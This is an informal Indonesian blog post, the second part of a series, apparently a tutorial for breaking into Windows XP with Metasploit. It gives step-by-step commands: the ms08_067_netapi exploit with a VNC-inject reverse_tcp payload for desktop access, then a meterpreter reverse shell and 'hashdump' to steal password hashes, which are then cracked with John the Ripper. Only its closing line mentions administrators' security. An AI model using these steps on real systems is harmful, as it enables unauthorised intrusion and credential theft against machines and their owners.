Lanjutan dari Part pertama yaitu Hacking Windows XP Via metaspoit Framework (CLI) dimana kita telah berhasil masuk ke dalam sistem melalui command prompt. kemudian ada seorang kawan protes
"ah... pusing ah liat ijo ijo tulisan gitu"
hehe... gak tau bersyukur banget yah dia :marah ... :ngakak .
baiklah... karena pengguna wind*ws nggak suka ma yang ijo ijo (padahal ijo mirip cendol loh :bigcendol ). pada post saat ini saya akan memberika tutorial masuk ke GUI windows dengan Metasploit Framework.seperti biasanya, kita menggunakan tool tool :
1. Metasploit Framework
2. John The Ripper
rileks bro... langsung saja...
1. nggak usah basa basi, kita akan tetap menggunakan eksploit "windows/smb/ms08_067_netapi
2. kemudian kita menggunakan payload yang berbeda dari Part.1 yaitu "windows/vncinject/reverse_tcp"
3.
kita ketikkan show options untuk mengetahui apa saja yang diperlukan.
4. Bila "
RHOST" belum terisi, silahkan isi dengan komputer target. kemudian isi "
LHOST" dengan IP komputer kita.
5. let's Hack With "
exploit" command.
Mudah Kan??? Tunggu dulu... Bagaimana bila kita mendapat Layar GUI seperti ini? (pasti nggak asing kalau sering nyimpen bokep)
jangan takut... maka dari itulah john the ripper dibuat. kita akan melakukan dumping password hash dengan payload meterpreter. payload ini fungsinya sama dengan shell_bind_tcp. namun lebih advance, dapat melakukan upload dan download. langsung ajah :
use payload windows/meterpreter/reverse_tcp
cek apakah ada variabel yang masih kurang (show options)
and... let's exploit !!!
masuklah kita ke console meterpreter... anda dapat melakukan apapun dari sini... tapi kita tetap ke obyektif pertama. yaitu mendapakan administrator password. makadari itu, kita perlu melakukan dumping hash password yang nantinya akan di crack dengna john the ripper. perintahnya cukup ketikkan "hashdump" pada konsol meterpreter.
salin hasil panen di atas, dan masukkan ke notepad, apalah... beri nama... apalah... kita tidak perlu buru buru karena proses cracking dapat dilakukan dimana saja. FYI: saat ini saya menggunakan password yang mudah, bila password nya ALAY seperti p4SSw0rDkU, ya... butuh waktu lama.
kita masuk ke command prompt, masuk direktori john the ripper, kemudian mengetikkan "
john-mmx.exe [filepasswod]". Gimana hasilnya??? kolom kiri adalah password dan kanan adalah usernya (tips ajah... coba pake huruf kecil ajah)(sekedar tambahan saja, anda dapat melakukannya dengan rainbowtablecrack yang tutorialnya terdapat disini
http://xp-ku.cc.cc/2011/10/cracking-hash-with-rainbow-table.html)
Yesss... sekali lagi kita mendapatkan kata
Huh... Cukup sekian tutorial ini... semoga digunakan sebaik baiknya bagi administrator untuk memperhatikan kemanannya. :jabat
Posting Komentar
Give Ur eXPerience about this eXPerience...